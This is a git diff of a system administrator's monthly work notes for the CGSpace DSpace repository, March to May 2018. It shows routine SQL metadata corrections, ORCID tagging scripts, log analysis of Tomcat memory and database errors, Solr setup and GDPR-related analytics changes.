    • Using a series of filters, flags, and GREL expressions to isolate items for a certain author, I figured out how to add ORCID identifiers to the cg.creator.id field
    • For example, a GREL expression in a custom text facet to get all items with dc.contributor.author[en_US] of a certain author with several name variations (this is how you use a logical OR in OpenRefine):
    -
    or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
    +
    or(value.contains('Ceballos, Hern'), value.contains('Hernández Ceballos'))
     
    • Then you can flag or star matching items and then use a conditional to either set the value directly or add it to an existing value:
    -
    if(isBlank(value), "Hernan Ceballos: 0000-0002-8744-7918", value + "||Hernan Ceballos: 0000-0002-8744-7918")
    +
    if(isBlank(value), "Hernan Ceballos: 0000-0002-8744-7918", value + "||Hernan Ceballos: 0000-0002-8744-7918")
     
    • One thing that bothers me is that this won’t honor author order
    • It might be better to do batches of these in PostgreSQL with a script that takes the place column of an author into account when setting the cg.creator.id
    • @@ -219,8 +219,8 @@ UPDATE 2309
    • The CSV should have two columns: author name and ORCID identifier:
    dc.contributor.author,cg.creator.id
    -"Orth, Alan",Alan S. Orth: 0000-0002-1735-7458
    -"Orth, A.",Alan S. Orth: 0000-0002-1735-7458
    +"Orth, Alan",Alan S. Orth: 0000-0002-1735-7458
    +"Orth, A.",Alan S. Orth: 0000-0002-1735-7458
     
    • I didn’t integrate the ORCID API lookup for author names in this script for now because I was only interested in “tagging” old items for a few given authors
    • I added ORCID identifers for 187 items by CIAT’s Hernan Ceballos, because that is what Elizabeth was trying to do manually!
    • @@ -240,10 +240,10 @@ UPDATE 2309 g/jspui/listings-and-reports -- Method: POST -- Parameters were: --- selected_admin_preset: "ilri authors2" --- load: "normal" --- next: "NEXT STEP >>" --- step: "1" +-- selected_admin_preset: "ilri authors2" +-- load: "normal" +-- next: "NEXT STEP >>" +-- step: "1" org.apache.jasper.JasperException: java.lang.NullPointerException
      @@ -295,7 +295,7 @@ org.apache.jasper.JasperException: java.lang.NullPointerException
    • I have removed the old server (linode02 aka linode578611) in favor of linode19 aka linode6624164
    • Looking at the CRP subjects on CGSpace I see there is one blank one so I’ll just fix it:
    -
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
     
    • Copy all CRP subjects to a CSV to do the mass updates:
    @@ -304,7 +304,7 @@ COPY 21
    • Once I prepare the new input forms (#362) I will need to do the batch corrections:
    -
    $ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
    +
    $ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
     
    • Create a pull request to update the input forms for the new CRP subject style (#366)
    @@ -322,7 +322,7 @@ COPY 21
    • But these errors, I don’t even know what they mean, because a handful of them happen every day:
    -
    $ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
    +
    $ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
     dspace.log.2018-03-10:13
     dspace.log.2018-03-11:15
     dspace.log.2018-03-12:13
    @@ -336,7 +336,7 @@ dspace.log.2018-03-19:90
     
    • There wasn’t even a lot of traffic at the time (8–9 AM):
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Mar/2018:0[89]:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "19/Mar/2018:0[89]:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          92 40.77.167.197
          92 83.103.94.48
          96 40.77.167.175
    @@ -351,7 +351,7 @@ dspace.log.2018-03-19:90
     
  • Well there is a hint in Tomcat’s catalina.out:
  • Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
    -Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
    +Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
     
    • So someone was doing something heavy somehow… my guess is content and usage stats!
    • ICT responded that they “fixed” the CGSpace connectivity issue in Nairobi without telling me the problem
    • @@ -377,21 +377,21 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
    • Abenet told me that one of Lance Robinson’s ORCID iDs on CGSpace is incorrect
    • I will remove it from the controlled vocabulary (#367) and update any items using the old one:
    -
    dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
    +
    dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
     UPDATE 1
     
    • Communicate with DSpace editors on Yammer about being more careful about spaces and character editing when doing manual metadata edits
    • Merge the changes to CRP names to the 5_x-prod branch and deploy on CGSpace (#363)
    • Run corrections for CRP names in the database:
    -
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
     
    • Run all system updates on CGSpace (linode18) and reboot the server
    • I started a full Discovery re-index on CGSpace because of the updated CRPs
    • I see this error in the DSpace log:
    -
    2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for  field "dc_contributor_author".
    -java.lang.IllegalArgumentException: No choices plugin was configured for  field "dc_contributor_author".
    +
    2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for  field "dc_contributor_author".
    +java.lang.IllegalArgumentException: No choices plugin was configured for  field "dc_contributor_author".
             at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:261)
             at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:249)
             at org.dspace.browse.SolrBrowseCreateDAO.additionalIndex(SolrBrowseCreateDAO.java:215)
    @@ -415,15 +415,15 @@ java.lang.IllegalArgumentException: No choices plugin was configured for  field
     
  • Unfortunately this causes those items to simply not be indexed, which users noticed because item counts were cut in half and old items showed up in RSS!
  • Since we’ve migrated the ORCID identifiers associated with the authority data to the cg.creator.id field we can nullify the authorities remaining in the database:
  • -
    dspace=# UPDATE metadatavalue SET authority=NULL WHERE resource_type_id=2 AND metadata_field_id=3 AND authority IS NOT NULL;
    -UPDATE 195463
    -
      +
      dspace=# UPDATE metadatavalue SET authority=NULL WHERE resource_type_id=2 AND metadata_field_id=3 AND authority IS NOT NULL;
      +UPDATE 195463
      +
      • After this the indexing works as usual and item counts and facets are back to normal
      • Send Peter a list of all authors to correct:
      -
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv header;
      -COPY 56156
      -
        +
        dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv header;
        +COPY 56156
        +
        • Afterwards we’ll want to do some batch tagging of ORCID identifiers to these names
        • CGSpace crashed again this afternoon, I’m not sure of the cause but there are a lot of SQL errors in the DSpace log:
        @@ -432,7 +432,7 @@ java.sql.SQLException: Connection has already been closed.
    • I have no idea why so many connections were abandoned this afternoon:
    -
    # grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
    +
    # grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
     268
     
    • DSpace Test crashed again due to Java heap space, this is from the DSpace log:
    • @@ -448,7 +448,7 @@ java.lang.OutOfMemoryError: Java heap space
    • But there are tons of heap space errors on DSpace Test actually:
    -
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
    +
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
     319
     
    • I guess we need to give it more RAM because it now has CGSpace’s large Solr core
    • @@ -521,8 +521,8 @@ sys 2m45.135s

      Test the corrections and deletions locally, then run them on CGSpace:

    -
    $ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
    -$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
    +$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
     
    • Afterwards I started a full Discovery reindexing on both CGSpace and DSpace Test
    • CGSpace took 76m28.292s
    • @@ -542,12 +542,12 @@ $ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.cont
    • DSpace Test crashed due to heap space so I’ve increased it from 4096m to 5120m
    • The error in Tomcat’s catalina.out was:
    -
    Exception in thread "RMI TCP Connection(idle)" java.lang.OutOfMemoryError: Java heap space
    +
    Exception in thread "RMI TCP Connection(idle)" java.lang.OutOfMemoryError: Java heap space
     
    • Add ISI Journal (cg.isijournal) as an option in Atmire’s Listing and Reports layout (#370) for Abenet
    • I noticed a few hundred CRPs using the old capitalized formatting so I corrected them:
    -
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
     Fixed 29 occurences of: CLIMATE CHANGE, AGRICULTURE AND FOOD SECURITY
     Fixed 7 occurences of: WATER, LAND AND ECOSYSTEMS
     Fixed 19 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
    diff --git a/docs/2018-04/index.html b/docs/2018-04/index.html
    index e51698b03..976f87793 100644
    --- a/docs/2018-04/index.html
    +++ b/docs/2018-04/index.html
    @@ -26,7 +26,7 @@ Catalina logs at least show some memory errors yesterday:
     I tried to test something on DSpace Test but noticed that it’s down since god knows when
     Catalina logs at least show some memory errors yesterday:
     "/>
    -
    +
     
     
         
    @@ -121,7 +121,7 @@ Catalina logs at least show some memory errors yesterday:
     SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]] 
     java.lang.OutOfMemoryError: Java heap space
     
    -Exception in thread "ContainerBackgroundProcessor[StandardEngine[Catalina]]" java.lang.OutOfMemoryError: Java heap space
    +Exception in thread "ContainerBackgroundProcessor[StandardEngine[Catalina]]" java.lang.OutOfMemoryError: Java heap space
     
    • So this is getting super annoying
    • I ran all system updates on DSpace Test and rebooted it
    • @@ -134,12 +134,12 @@ Exception in thread "ContainerBackgroundProcessor[StandardEngine[Catalina]]
    • Peter noticed that there were still some old CRP names on CGSpace, because I hadn’t forced the Discovery index to be updated after I fixed the others last week
    • For completeness I re-ran the CRP corrections on CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
     Fixed 1 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
     
    • Then started a full Discovery index:
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
     
     real    76m13.841s
    @@ -149,12 +149,12 @@ sys     2m2.498s
     
  • Elizabeth from CIAT emailed to ask if I could help her by adding ORCID identifiers to all of Joseph Tohme’s items
  • I used my add-orcid-identifiers-csv.py script:
  • -
    $ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
     
    • The CSV format of jtohme-2018-04-04.csv was:
    dc.contributor.author,cg.creator.id
    -"Tohme, Joseph M.",Joe Tohme: 0000-0003-2765-7101
    +"Tohme, Joseph M.",Joe Tohme: 0000-0003-2765-7101
     
    • There was a quoting error in my CRP CSV and the replacements for Forests, Trees and Agroforestry got messed up
    • So I fixed them and had to re-index again!
    • @@ -193,7 +193,7 @@ sys 2m52.585s
    • Help Peter with the GDPR compliance / reporting form for CGSpace
    • DSpace Test crashed due to memory issues again:
    -
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
    +
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
     16
     
    • I ran all system updates on DSpace Test and rebooted it
    • @@ -205,7 +205,7 @@ sys 2m52.585s
    • I got a notice that CGSpace CPU usage was very high this morning
    • Looking at the nginx logs, here are the top users today so far:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                   
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                   
         282 207.46.13.112
         286 54.175.208.220
         287 207.46.13.113
    @@ -220,24 +220,24 @@ sys     2m52.585s
     
  • 45.5.186.2 is of course CIAT
  • 95.108.181.88 appears to be Yandex:
  • -
    95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] "GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
    +
    95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] "GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
     
    • And for some reason Yandex created a lot of Tomcat sessions today:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
     4363
     
    • 70.32.83.92 appears to be some harvester we’ve seen before, but on a new IP
    • They are not creating new Tomcat sessions so there is no problem there
    • 178.154.200.38 also appears to be Yandex, and is also creating many Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
     3982
     
    • I’m not sure why Yandex creates so many Tomcat sessions, as its user agent should match the Crawler Session Manager valve
    • Let’s try a manual request with and without their user agent:
    -
    $ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
    +
    $ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
     GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
     Accept: */*
     Accept-Encoding: gzip, deflate
    @@ -294,7 +294,7 @@ X-XSS-Protection: 1; mode=block
     
    • In other news, it looks like the number of total requests processed by nginx in March went down from the previous months:
    -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2018"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2018"
     2266594
     
     real    0m13.658s
    @@ -305,23 +305,23 @@ sys     0m1.087s
     
     
    $ dspace cleanup -v
     ...
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(151626) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(151626) is still referenced from table "bundle".
     
    • The solution is, as always:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
     UPDATE 1
     
    • Looking at abandoned connections in Tomcat:
    -
    # zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
    +
    # zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
     2115
     
    • Apparently from these stacktraces we should be able to see which code is not closing connections properly
    • Here’s a pretty good overview of days where we had database issues recently:
    -
    # zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
    +
    # zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
           1 Feb 18, 2018
           1 Feb 19, 2018
           1 Feb 20, 2018
    @@ -356,7 +356,7 @@ UPDATE 1
     
    • DSpace Test (linode19) crashed again some time since yesterday:
    -
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
    +
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
     168
     
    • I ran all system updates and rebooted the server
    • @@ -374,7 +374,7 @@ UPDATE 1
      • While testing an XMLUI patch for DS-3883 I noticed that there is still some remaining Authority / Solr configuration left that we need to remove:
      -
      2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check "solr.authority.server" property in the dspace.cfg
      +
      2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check "solr.authority.server" property in the dspace.cfg
       java.lang.NullPointerException
       
      • I assume we need to remove authority from the consumers in dspace/config/dspace.cfg:
      • @@ -422,14 +422,14 @@ webui.itemlist.sort-option.4 = type:dc.type:text
      • They are missing the order parameter (ASC vs DESC)
      • I notice that DSpace Test has crashed again, due to memory:
      -
      # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
      +
      # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
       178
       
      • I will increase the JVM heap size from 5120M to 6144M, though we don’t have much room left to grow as DSpace Test (linode19) is using a smaller instance size than CGSpace
      • Gabriela from CIP asked if I could send her a list of all CIP authors so she can do some replacements on the name formats
      • I got a list of all the CIP collections manually and use the same query that I used in August, 2017:
      -
      dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
      +
      dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
       

      2018-04-19

      • Run updates on DSpace Test (linode19) and reboot the server
      • @@ -460,17 +460,17 @@ sys 2m2.687s
      • And there have been shit tons of errors in the last (starting only 20 minutes ago luckily):
      -
      # grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
      +
      # grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
       32147
       
      • I can’t even log into PostgreSQL as the postgres user, WTF?
      -
      $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c 
      +
      $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c 
       ^C
       
      • Here are the most active IPs today:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           917 207.46.13.182
           935 213.55.99.121
           970 40.77.167.134
      @@ -484,11 +484,11 @@ sys     2m2.687s
       
      • It doesn’t even seem like there is a lot of traffic compared to the previous days:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | wc -l
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | wc -l
       74931
      -# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E "19/Apr/2018" | wc -l
      +# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E "19/Apr/2018" | wc -l
       91073
      -# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E "18/Apr/2018" | wc -l
      +# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E "18/Apr/2018" | wc -l
       93459
       
      • I tried to restart Tomcat but systemctl hangs
      • @@ -543,7 +543,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Time
      • One other new thing I notice is that PostgreSQL 9.6 no longer uses createuser and nocreateuser, as those have actually meant superuser and nosuperuser and have been deprecated for ten years
      • So for my notes, when I’m importing a CGSpace database dump I need to amend my notes to give super user permission to a user, rather than create user:
      -
      $ psql dspacetest -c 'alter user dspacetest superuser;'
      +
      $ psql dspacetest -c 'alter user dspacetest superuser;'
       $ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-18.backup
       
      • There’s another issue with Tomcat in Ubuntu 18.04:
      • diff --git a/docs/2018-05/index.html b/docs/2018-05/index.html index 28955e429..3f7991480 100644 --- a/docs/2018-05/index.html +++ b/docs/2018-05/index.html @@ -38,7 +38,7 @@ http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E Then I reduced the JVM heap size from 6144 back to 5120m Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use "/> - + @@ -218,7 +218,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
      • I found some more IITA records that Sisay imported on 2018-03-23 that have invalid CRP names, so now I kinda want to check those ones!
      • Combine the ORCID identifiers Abenet sent with our existing list and resolve their names using the resolve-orcids.py script:
      -
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-05-06-combined.txt
      +
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-05-06-combined.txt
       $ ./resolve-orcids.py -i /tmp/2018-05-06-combined.txt -o /tmp/2018-05-06-combined-names.txt -d
       # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
       $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
      @@ -242,12 +242,12 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
       
    • I could use it with reconcile-csv or to populate a Solr instance for reconciliation
    • This XPath expression gets close, but outputs all items on one line:
    -
    $ xmllint --xpath '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/node()' dspace/config/input-forms.xml        
    +
    $ xmllint --xpath '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/node()' dspace/config/input-forms.xml        
     Agriculture for Nutrition and HealthBig DataClimate Change, Agriculture and Food SecurityExcellence in BreedingFishForests, Trees and AgroforestryGenebanksGrain Legumes and Dryland CerealsLivestockMaizePolicies, Institutions and MarketsRiceRoots, Tubers and BananasWater, Land and EcosystemsWheatAquatic Agricultural SystemsDryland CerealsDryland SystemsGrain LegumesIntegrated Systems for the Humid TropicsLivestock and Fish
     
    • Maybe xmlstarlet is better:
    -
    $ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/text()' dspace/config/input-forms.xml
    +
    $ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/text()' dspace/config/input-forms.xml
     Agriculture for Nutrition and Health
     Big Data
     Climate Change, Agriculture and Food Security
    @@ -313,12 +313,12 @@ Livestock and Fish
     
    import urllib2
     import re
     
    -pattern = re.compile('.*10.1016.*')
    +pattern = re.compile('.*10.1016.*')
     if pattern.match(value):
       get = urllib2.urlopen(value)
       return get.getcode()
     
    -return "blank"
    +return "blank"
     
    • I used a regex to limit it to just some of the DOIs in this case because there were thousands of URLs
    • Here the response code would be 200, 404, etc, or “blank” if there is no URL for that item
    • @@ -348,7 +348,7 @@ return "blank"
    $ ./bin/solr start
     $ ./bin/solr create_core -c countries
    -$ curl -X POST -H 'Content-type:application/json' --data-binary '{"add-field": {"name":"country", "type":"text_en", "multiValued":false, "stored":true}}' http://localhost:8983/solr/countries/schema
    +$ curl -X POST -H 'Content-type:application/json' --data-binary '{"add-field": {"name":"country", "type":"text_en", "multiValued":false, "stored":true}}' http://localhost:8983/solr/countries/schema
     $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
     
    • It still doesn’t catch simple mistakes like “ALBANI” or “AL BANIA” for “ALBANIA”, and it doesn’t return scores, so I have to select matches manually:
    • @@ -359,7 +359,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
    <defaultSearchField>search_text</defaultSearchField>
     ...
    -<copyField source="*" dest="search_text"/>
    +<copyField source="*" dest="search_text"/>
     
    • Actually, I wonder how much of their schema I could just copy…
    • Apparently the default search field is the df parameter and you could technically just add it to the query string, so no need to bother with that in the schema now
    • @@ -370,7 +370,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
      • Discuss GDPR with James Stapleton
          -
        • As far as I see it, we are “Data Controllers” on CGSpace because we store peoples' names, emails, and phone numbers if they register
        • +
        • As far as I see it, we are “Data Controllers” on CGSpace because we store peoples’ names, emails, and phone numbers if they register
        • We set cookies on the user’s computer, but these do not contain personally identifiable information (PII) and they are “session” cookies which are deleted when the user closes their browser
        • We use Google Analytics to track website usage, which makes Google the “Data Processor” and in this case we merely need to limit or obfuscate the information we send to them
        • As the only personally identifiable information we send is the user’s IP address, I think we only need to enable IP Address Anonymization in our analytics.js code snippets
        • @@ -381,8 +381,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
        • I created and merged a pull request to fix the sorting issue in Listings and Reports (#374)
        • Regarding the IP Address Anonymization for GDPR, I ammended the Google Analytics snippet in page-structure-alterations.xsl to:
        -
        ga('send', 'pageview', {
        -  'anonymizeIp': true
        +
        ga('send', 'pageview', {
        +  'anonymizeIp': true
         });
         
        • I tested loading a certain page before and after adding this and afterwards I saw that the parameter aip=1 was being sent with the analytics response to Google
        • @@ -439,7 +439,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
          • I’m investigating how many non-CGIAR users we have registered on CGSpace:
          -
          dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
          +
          dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
           
          • We might need to do something regarding these users for GDPR compliance because we have their names, emails, and potentially phone numbers
          • I decided that I will just use the cookieconsent script as is, since it looks good and technically does set the cookie with “allow” or “dismiss”
          • @@ -471,8 +471,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
